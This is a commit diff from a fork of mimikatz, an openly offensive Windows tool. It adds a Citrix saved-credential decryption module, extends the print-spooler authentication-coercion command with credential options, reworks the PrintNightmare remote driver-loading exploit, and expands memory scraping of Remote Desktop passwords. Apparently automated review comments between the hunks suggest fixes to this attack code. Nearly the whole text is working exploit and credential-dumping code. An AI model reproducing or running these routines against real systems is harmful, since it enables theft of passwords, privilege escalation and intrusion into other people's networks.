
Merge branch 'gentilkiwi:master' into master

This commit is contained in:
hubert3 2022-07-21 12:30:19 +10:00 committed by GitHub
commit a952a601b5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
35 changed files with 1071 additions and 271 deletions


@ -118,7 +118,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_BUILD_10_1909 18363
#define KULL_M_WIN_BUILD_10_2004 19041
#define KULL_M_WIN_BUILD_10_20H2 19042
#define KULL_M_WIN_BUILD_2022 20348
#define KULL_M_WIN_MIN_BUILD_XP 2500
#define KULL_M_WIN_MIN_BUILD_2K3 3000
@ -126,4 +126,5 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_MIN_BUILD_7 7000
#define KULL_M_WIN_MIN_BUILD_8 8000
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
#define KULL_M_WIN_MIN_BUILD_10 9800
#define KULL_M_WIN_MIN_BUILD_10 9800
#define KULL_M_WIN_MIN_BUILD_11 22000


@ -173,6 +173,7 @@
<ClCompile Include="modules\dpapi\kuhl_m_dpapi.c" />
<ClCompile Include="modules\dpapi\kuhl_m_dpapi_oe.c" />
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.c" />
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c" />
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_cloudap.c" />
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_creds.c" />
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_keys.c" />
@ -289,6 +290,7 @@
<ClInclude Include="modules\dpapi\kuhl_m_dpapi.h" />
<ClInclude Include="modules\dpapi\kuhl_m_dpapi_oe.h" />
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.h" />
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h" />
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_cloudap.h" />
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_creds.h" />
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_keys.h" />


@ -329,6 +329,9 @@
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-efsr_c.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c">
<Filter>local modules\dpapi\packages</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="mimikatz.h" />
@ -677,6 +680,9 @@
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-efsr.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h">
<Filter>local modules\dpapi\packages</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Filter Include="local modules">


@ -27,6 +27,7 @@ const KUHL_M_C kuhl_m_c_dpapi[] = {
{kuhl_m_dpapi_cloudap_keyvalue_derived, L"cloudapkd", L""},
{kuhl_m_dpapi_cloudap_fromreg, L"cloudapreg", L""},
{kuhl_m_dpapi_sccm_networkaccessaccount, L"sccm", L""},
{kuhl_m_dpapi_citrix, L"citrix", L""},
{kuhl_m_dpapi_oe_cache, L"cache", NULL},
};
const KUHL_M kuhl_m_dpapi = {


@ -20,6 +20,7 @@
#include "packages/kuhl_m_dpapi_lunahsm.h"
#include "packages/kuhl_m_dpapi_cloudap.h"
#include "packages/kuhl_m_dpapi_sccm.h"
#include "packages/kuhl_m_dpapi_citrix.h"
const KUHL_M kuhl_m_dpapi;


@ -0,0 +1,89 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kuhl_m_dpapi_citrix.h"
const char CITRIX_SAVED_CREDENTIALS_GUID[] = "{921BB3E1-15EE-4bbe-83D4-C4CE176A481B}";
NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[])
{
PKULL_M_REGISTRY_HANDLE hRegistry;
PBYTE pbData;
DWORD cbData;
LPCWSTR szData;
LPWSTR szGuid = NULL, szUrl, szBase64, szSavedCreds;
LPSTR sEntropy;
IXMLDOMDocument *pXMLDom;
IXMLDOMNode *pNode;
LPVOID pDataOut;
DWORD dwDataOutLen;
if(kull_m_string_args_byName(argc, argv, L"guid", &szData, NULL))
{
kull_m_string_copy(&szGuid, szData);
}
else if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, FALSE, &hRegistry)) // todo: offline
{
//For v3, KEY_WOW64_32KEY
kull_m_registry_OpenAndQueryWithAlloc(hRegistry, HKEY_LOCAL_MACHINE, L"SOFTWARE\\"
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
L"WOW6432Node\\"
#endif
L"Citrix\\AuthManager", L"Guid", NULL, (LPVOID *) &szGuid, NULL);
kull_m_registry_close(hRegistry);
}
if(szGuid)
{
kprintf(L"Citrix instance GUID : %s\n", szGuid);
if(kull_m_string_args_byName(argc, argv, L"in", &szData, NULL))
{
kprintf(L"Using saved data from: %s\n", szData);
if(pXMLDom = kull_m_xml_CreateAndInitDOM())
{
if(kull_m_xml_LoadXMLFile(pXMLDom, szData))
{
if((IXMLDOMDocument_selectSingleNode(pXMLDom, (BSTR) L"//Data/Item", &pNode) == S_OK) && pNode)
{
szUrl = kull_m_xml_getAttribute(pNode, L"url");
if(szUrl)
{
kprintf(L"URL: %s\n", szUrl);
kull_m_string_sprintfA(&sEntropy, "%S%s%S", szUrl, CITRIX_SAVED_CREDENTIALS_GUID, szGuid);
if(sEntropy)
{
if(IXMLDOMNode_get_text(pNode, &szBase64) == S_OK)
{
if(kull_m_string_quick_base64_to_Binary(szBase64, &pbData, &cbData))
{
if(kuhl_m_dpapi_unprotect_raw_or_blob(pbData, cbData, NULL, argc, argv, sEntropy, lstrlenA(sEntropy), &pDataOut, &dwDataOutLen, NULL))
{
if(kull_m_string_copy_len(&szSavedCreds, (LPCWSTR) pDataOut, dwDataOutLen / sizeof(wchar_t)))
{
UrlUnescapeInPlace(szSavedCreds, 0);
kprintf(L" > Saved data: %s\n", szSavedCreds);
LocalFree(szSavedCreds);
}
LocalFree(pDataOut);
}
}
SysFreeString(szBase64);
}
LocalFree(sEntropy);
}
LocalFree(szUrl);
}
}
}
kull_m_xml_ReleaseDom(pXMLDom);
}
}
else PRINT_ERROR(L"Input Citrix saved data needed (/in:%%localappdata%%\\Citrix\\AuthManager\\Data\\<file.dat>)\n");
LocalFree(szGuid);
}
else PRINT_ERROR(L"No instance GUID ? (use /guid:xxx (without {} to specify\n");
return STATUS_SUCCESS;
}
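Review bot: The HRESULT from `UrlUnescapeInPlace(szSavedCreds, 0)` is discarded, so a failed unescape still prints the buffer as if it had been fully decoded; guarding the print with `if(SUCCEEDED(UrlUnescapeInPlace(szSavedCreds, 0)))` keeps the output honest. The copy into szSavedCreds uses `dwDataOutLen / sizeof(wchar_t)`, which silently drops a trailing odd byte if the unprotected blob is not an even number of bytes — presumably always wide text here, but nothing in the function checks it. A one-line comment above the `kull_m_string_sprintfA` call stating that the optional entropy is the concatenation of the item URL, the fixed `CITRIX_SAVED_CREDENTIALS_GUID` and the instance GUID would document a derivation that is otherwise only implicit in the `"%S%s%S"` format string.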


@ -0,0 +1,9 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "../kuhl_m_dpapi.h"
NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[]);


@ -1342,58 +1342,127 @@ handle_t __RPC_USER STRING_HANDLE_bind(IN STRING_HANDLE Name) {return hSpoolHand
void __RPC_USER STRING_HANDLE_unbind(IN STRING_HANDLE Name, handle_t hSpool) {}
NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[])
{
LPCWSTR szRemote, szCallbackTo;
LPWSTR szPathToCallback = NULL;
NTSTATUS status;
PRINTER_HANDLE hPrinter;
DEVMODE_CONTAINER Container = {0, NULL};
DWORD ret;
DWORD dwRet, AuthnSvc;
long ret = 0;
NETRESOURCE nr = {0, RESOURCETYPE_DISK, 0, 0, NULL, NULL, NULL, NULL};
LPCWSTR szUser, szPassword, szRemote = NULL, szEndpoint, szCallbackTo;
PWSTR szPathToCallback;
SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
if(kull_m_string_args_byName(argc, argv, L"authuser", &szUser, NULL))
{
AuthnSvc = RPC_C_AUTHN_GSS_NEGOTIATE;
kprintf(L"[auth ] Explicit authentication\n");
kprintf(L"[auth ] Username: %s\n", szUser);
secIdentity.User = (USHORT *) szUser;
secIdentity.UserLength = lstrlen(szUser);
if(kull_m_string_args_byName(argc, argv, L"authpassword", &szPassword, NULL))
{
kprintf(L"[auth ] Password: %s\n", szPassword);
secIdentity.Password = (USHORT *) szPassword;
secIdentity.PasswordLength = lstrlen(szPassword);
}
}
else if(kull_m_string_args_byName(argc, argv, L"noauth", NULL, NULL))
{
AuthnSvc = RPC_C_AUTHN_NONE;
kprintf(L"[auth ] None\n");
szUser = szPassword = L"";
}
else
{
AuthnSvc = RPC_C_AUTHN_DEFAULT;
kprintf(L"[auth ] Default (current)\n");
szUser = szPassword = NULL;
}
kull_m_string_args_byName(argc, argv, L"endpoint", &szEndpoint, L"\\pipe\\spoolss");
kprintf(L"[ rpc ] Endpoint: %s\n", szEndpoint);
if(kull_m_string_args_byName(argc, argv, L"server", &szRemote, NULL) || kull_m_string_args_byName(argc, argv, L"target", &szRemote, NULL))
{
if(kull_m_string_args_byName(argc, argv, L"connect", &szCallbackTo, NULL) || kull_m_string_args_byName(argc, argv, L"callback", &szCallbackTo, NULL))
{
if(kull_m_string_sprintf(&szPathToCallback, L"\\\\%s", szCallbackTo))
if(kull_m_string_sprintf(&nr.lpRemoteName, L"\\\\%s\\IPC$", szRemote))
{
kprintf(L"[info] %s will try to connect to %s\\IPC$\n\n", szRemote, szPathToCallback);
if(kull_m_rpc_createBinding(NULL, L"ncacn_np", szRemote, L"\\pipe\\spoolss", L"spooler", TRUE, RPC_C_AUTHN_DEFAULT, NULL, RPC_C_IMP_LEVEL_DEFAULT, &hSpoolHandle, NULL))
if(kull_m_string_sprintf(&szPathToCallback, L"\\\\%s", szCallbackTo))
{
RpcTryExcept
kprintf(L"[trans] Disconnect eventual IPC: ");
dwRet = WNetCancelConnection2(nr.lpRemoteName, 0, TRUE);
if((dwRet == NO_ERROR) || (dwRet == ERROR_NOT_CONNECTED))
{
ret = RpcOpenPrinter(NULL, &hPrinter, NULL, &Container, GENERIC_READ);
if(ret == ERROR_SUCCESS)
kprintf(L"OK\n[trans] Connect to IPC: ");
dwRet = WNetAddConnection2(&nr, szPassword, szUser, CONNECT_TEMPORARY);
if(dwRet == NO_ERROR)
{
ret = RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ALL, PRINTER_NOTIFY_CATEGORY_ALL, szPathToCallback, 42, 0, NULL);
if(ret == ERROR_SUCCESS)
kprintf(L"OK\n");
if(kull_m_rpc_createBinding(NULL, L"ncacn_np", szRemote, szEndpoint, L"spooler", TRUE, AuthnSvc, secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hSpoolHandle, NULL))
{
kprintf(L"Connected to the target, and notification is OK (?!)\n");
ret = RpcFindClosePrinterChangeNotification(hPrinter);
if(ret != ERROR_SUCCESS)
kprintf(L"[ rpc ] Resolve Endpoint: ");
status = RpcEpResolveBinding(hSpoolHandle, &winspool_v1_0_c_ifspec);
if(status == RPC_S_OK)
{
PRINT_ERROR(L"RpcFindClosePrinterChangeNotification: 0x%08x\n", ret);
kprintf(L"OK\n\n");
RpcTryExcept
{
ret = RpcOpenPrinter(NULL, &hPrinter, NULL, &Container, GENERIC_READ);
if(ret == ERROR_SUCCESS)
{
ret = RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ALL, PRINTER_NOTIFY_CATEGORY_ALL, szPathToCallback, 42, 0, NULL);
if(ret == ERROR_SUCCESS)
{
kprintf(L"Connected to the target, and notification is OK (?!)\n");
ret = RpcFindClosePrinterChangeNotification(hPrinter);
if(ret != ERROR_SUCCESS)
{
PRINT_ERROR(L"RpcFindClosePrinterChangeNotification: 0x%08x\n", ret);
}
}
else if(ret == ERROR_ACCESS_DENIED)
{
kprintf(L"Access is denied (can be OK)\n");
}
else PRINT_ERROR(L"RpcRemoteFindFirstPrinterChangeNotification: 0x%08x\n", ret);
ret = RpcClosePrinter(&hPrinter);
if(ret != ERROR_SUCCESS)
{
PRINT_ERROR(L"RpcClosePrinter: 0x%08x\n", ret);
}
}
else PRINT_ERROR(L"RpcOpenPrinter: 0x%08x\n", ret);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kprintf(L"\n");
}
else PRINT_ERROR(L"RpcEpResolveBinding: 0x%08x\n", status);
kull_m_rpc_deleteBinding(&hSpoolHandle);
}
else if(ret == ERROR_ACCESS_DENIED)
{
kprintf(L"Access is denied (can be OK)\n");
}
else PRINT_ERROR(L"RpcRemoteFindFirstPrinterChangeNotification: 0x%08x\n", ret);
ret = RpcClosePrinter(&hPrinter);
if(ret != ERROR_SUCCESS)
kprintf(L"[trans] Disconnect IPC: ");
dwRet = WNetCancelConnection2(nr.lpRemoteName, 0, TRUE);
if(dwRet == NO_ERROR)
{
PRINT_ERROR(L"RpcClosePrinter: 0x%08x\n", ret);
kprintf(L"OK\n");
}
else PRINT_ERROR(L"WNetCancelConnection2: 0x%08x\n");
}
else PRINT_ERROR(L"RpcOpenPrinter: 0x%08x\n", ret);
else PRINT_ERROR(L"WNetAddConnection2:%u\n", dwRet);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
else PRINT_ERROR(L"WNetCancelConnection2: %u\n", dwRet);
kull_m_rpc_deleteBinding(&hSpoolHandle);
LocalFree(szPathToCallback);
}
LocalFree(szPathToCallback);
LocalFree(nr.lpRemoteName);
}
}
else PRINT_ERROR(L"missing /connect argument to specify notifications target");
@ -1482,11 +1551,11 @@ NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[])
else if(ret == 0)
{
PRINT_ERROR(L"EfsRpcOpenFileRaw is a success, really? (not normal)\n");
EfsRpcCloseRaw(&hEfsHandle);
EfsRpcCloseRaw(&hImportCtx);
}
else
{
PRINT_ERROR(L"EfsRpcOpenFileRaw: ", ret);
PRINT_ERROR(L"EfsRpcOpenFileRaw: %u\n", ret);
}
}
RpcExcept(RPC_EXCEPTION)
@ -1589,7 +1658,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
DriverInfo.pEnvironment = bIsX64 ? L"Windows x64" : L"Windows NT x86";
if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
{
if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pConfigFile, NULL))
if(kuhl_m_misc_printnightmare_normalize_library(bIsPar, szLibrary, &DriverInfo.pConfigFile, NULL))
{
szForce = kull_m_string_args_byName(argc, argv, L"useown", NULL, NULL) ? DriverInfo.pConfigFile : NULL;
@ -1600,7 +1669,13 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
{
if(kuhl_m_misc_printnightmare_FillStructure(&DriverInfo, bIsX64, !kull_m_string_args_byName(argc, argv, L"nodynamic", NULL, NULL), szForce, bIsPar, hSpoolHandle))
{
kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER);
if(kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER))
{
if(!bIsPar) // we can't remotely with normal user, use /clean with > rights
{
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hSpoolHandle, DriverInfo.pEnvironment, DriverInfo.pName);
}
}
LocalFree(DriverInfo.pDataFile);
LocalFree(DriverInfo.pDriverPath);
@ -1624,7 +1699,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
{
BOOL status = FALSE;
LPCWSTR szPtr;
@ -1641,7 +1716,14 @@ BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *psz
}
else
{
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
if(!bIsPar)
{
status = kull_m_file_getAbsolutePathOf(szLibrary, pszNormalizedLibrary);
}
else
{
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
}
}
if(status)
@ -1742,7 +1824,7 @@ BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete)
{
DWORD i, ret, cReturned = 0;
DWORD i, cReturned = 0;
_PDRIVER_INFO_2 pDriverInfo;
PWSTR pName, pConfig;
@ -1759,28 +1841,7 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
{
if(pName == wcsstr(pName, MIMIKATZ L"-"))
{
RpcTryExcept
{
if(bIsPar)
{
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
}
else
{
kprintf(L"> RpcDeletePrinterDriverEx: ");
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
}
if (ret == ERROR_SUCCESS)
{
kprintf(L"OK!\n");
}
else PRINT_ERROR(L"%u\n", ret);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hRemoteBinding, szEnvironment, pName);
}
}
}
@ -1789,8 +1850,9 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
}
}
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
{
BOOL status = FALSE;
DWORD ret;
DRIVER_CONTAINER container_info;
@ -1813,6 +1875,7 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
if (ret == ERROR_SUCCESS)
{
status = TRUE;
kprintf(L"OK!\n");
}
else PRINT_ERROR(L"%u\n", ret);
@ -1820,6 +1883,40 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
return status;
}
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName)
{
BOOL status = FALSE;
DWORD ret;
RpcTryExcept
{
if(bIsPar)
{
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, (wchar_t *) pName, DPD_DELETE_UNUSED_FILES, 0);
}
else
{
kprintf(L"> RpcDeletePrinterDriverEx: ");
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, (wchar_t *)pName, DPD_DELETE_UNUSED_FILES, 0);
}
if (ret == ERROR_SUCCESS)
{
status = TRUE;
kprintf(L"OK!\n");
}
else PRINT_ERROR(L"%u\n", ret);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
return status;
}
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned)
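Review bot: In the reworked kuhl_m_misc_spooler the error path after the final `WNetCancelConnection2` call passes a format string with a `0x%08x` conversion but no matching argument (`PRINT_ERROR(L"WNetCancelConnection2: 0x%08x\n");`), so the value printed is whatever happens to sit in the variadic slot — undefined behaviour, and it hides the real error code; the earlier disconnect branch already does this correctly, so the line should read `else PRINT_ERROR(L"WNetCancelConnection2: %u\n", dwRet);`. The explicit-authentication branch also echoes the supplied secret with `kprintf(L"[auth ] Password: %s\n", szPassword);`, which lands it in console transcripts and log captures; printing only the username (or a fixed placeholder) would avoid that. `ret` now appears to be declared `long` while it holds the same DWORD-style error codes as the adjacent `dwRet`, which works but reads inconsistently. The body of kuhl_m_misc_spooler ends outside the hunk.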


@ -51,10 +51,11 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete);
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName);
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned);
BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);


@ -645,7 +645,7 @@ NTSTATUS kuhl_m_net_trust(int argc, wchar_t * argv[])
else PRINT_ERROR(L"DsEnumerateDomainTrusts: %u\n", ret);
kprintf(L"\n\nLDAP mode: ");
if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn))
if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn, NULL))
{
if(kull_m_string_sprintf(&sysDN, L"CN=System,%s", dn))
{
@ -761,7 +761,7 @@ L")";
BOOL isCheckDNS = kull_m_string_args_byName(argc, argv, L"dns", NULL, NULL);
kull_m_string_args_byName(argc, argv, L"server", &server, NULL);
if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn))
if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn, NULL))
{
dwRet = ldap_search_s(ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, &pMessage);
if(dwRet == LDAP_SUCCESS)


@ -317,7 +317,7 @@ BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR
PWCHAR myAttrs[] = {L"name", L"sAMAccountName", L"objectSid", L"sIDHistory", L"objectGUID", NULL}, dn, filter;
if(filter = kuhl_m_sid_filterFromArgs(argc, argv))
{
if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn))
if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn, NULL))
{
*pMessage = NULL;
dwErr = ldap_search_s(*ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, pMessage);


@ -204,12 +204,15 @@ NTSTATUS kuhl_m_ts_logonpasswords(int argc, wchar_t * argv[])
const BYTE MyPattern[] = {0x00, 0x00, 0x00, 0x00, 0xbb, 0x47, /*0x0b, 0x00*/};
const BYTE MyPattern2[] = {0x00, 0x00, 0x00, 0x00, 0xf3, 0x47, /*0x0b, 0x00*/};
const BYTE MyPattern3[] = {0x00, 0x00, 0x00, 0x00, 0x3b, 0x01};
const BYTE MyWebPattern[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION pMemoryBasicInformation, PVOID pvArg)
{
KULL_M_MEMORY_ADDRESS aLocalBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aProcess = {pMemoryBasicInformation->BaseAddress, (PKULL_M_MEMORY_HANDLE) pvArg};
PBYTE CurrentPtr, limite;
PBYTE CurrentPtr, limite, ref;
PWTS_KIWI pKiwiData;
BOOL decStatus = TRUE, bIsCandidate;
PWTS_WEB_KIWI pWebKiwiData;
BOOL decStatus, bIsCandidate;
DWORD dwOffset;
if((pMemoryBasicInformation->Type == MEM_PRIVATE) && (pMemoryBasicInformation->State != MEM_FREE) && (pMemoryBasicInformation->Protect == PAGE_READWRITE))
{
@ -218,7 +221,7 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
{
if(kull_m_memory_copy(&aLocalBuffer, &aProcess, pMemoryBasicInformation->RegionSize))
{
for(CurrentPtr = (PBYTE) aLocalBuffer.address, limite = (PBYTE) aLocalBuffer.address + pMemoryBasicInformation->RegionSize; CurrentPtr + sizeof(MyPattern) <= limite; CurrentPtr++)
for(CurrentPtr = (PBYTE) aLocalBuffer.address, limite = (PBYTE) aLocalBuffer.address + pMemoryBasicInformation->RegionSize; CurrentPtr + sizeof(MyWebPattern) <= limite; CurrentPtr += sizeof(PVOID))
{
pKiwiData = (PWTS_KIWI) CurrentPtr;
@ -232,31 +235,91 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
}
else bIsCandidate = FALSE;
if(bIsCandidate && !pKiwiData->unk2)
if(bIsCandidate)
{
//kprintf(L"-> %08x (%hu %hu %hu)\n", pKiwiData->unk1, pKiwiData->cbDomain, pKiwiData->cbUsername, pKiwiData->cbPassword);
if(!(pKiwiData->cbDomain & 1) && (pKiwiData->cbDomain < sizeof(pKiwiData->Domain)))
if(!pKiwiData->unk2)
{
if(!(pKiwiData->cbUsername & 1) && (pKiwiData->cbUsername > sizeof(wchar_t)) && (pKiwiData->cbUsername < sizeof(pKiwiData->UserName)))
//kprintf(L"-> %08x (%hu %hu %hu)\n", pKiwiData->unk1, pKiwiData->cbDomain, pKiwiData->cbUsername, pKiwiData->cbPassword);
if(!(pKiwiData->cbDomain & 1) && (pKiwiData->cbDomain < sizeof(pKiwiData->Domain)))
{
if(!(pKiwiData->cbPassword & 1) && (pKiwiData->cbPassword < sizeof(pKiwiData->Password)))
if(!(pKiwiData->cbUsername & 1) && (pKiwiData->cbUsername > sizeof(wchar_t)) && (pKiwiData->cbUsername < sizeof(pKiwiData->UserName)))
{
kprintf(
L"\n Domain : %.*s\n"
L" UserName : %.*s\n",
pKiwiData->cbDomain / sizeof(wchar_t), pKiwiData->Domain,
pKiwiData->cbUsername/ sizeof(wchar_t), pKiwiData->UserName
);
if(pKiwiData->cbPassword && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10))
if(!(pKiwiData->cbPassword & 1) && (pKiwiData->cbPassword < sizeof(pKiwiData->Password)))
{
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pKiwiData->Password, sizeof(pKiwiData->Password), CRYPTPROTECTMEMORY_SAME_PROCESS);
}
kprintf(
L"\n Domain : %.*s\n"
L" UserName : %.*s\n",
pKiwiData->cbDomain / sizeof(wchar_t), pKiwiData->Domain,
pKiwiData->cbUsername / sizeof(wchar_t), pKiwiData->UserName
);
